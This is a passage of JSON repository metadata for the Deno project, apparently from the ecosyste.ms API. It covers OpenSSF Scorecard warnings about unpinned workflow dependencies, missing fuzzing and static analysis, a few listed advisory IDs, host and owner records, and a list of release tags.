GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denola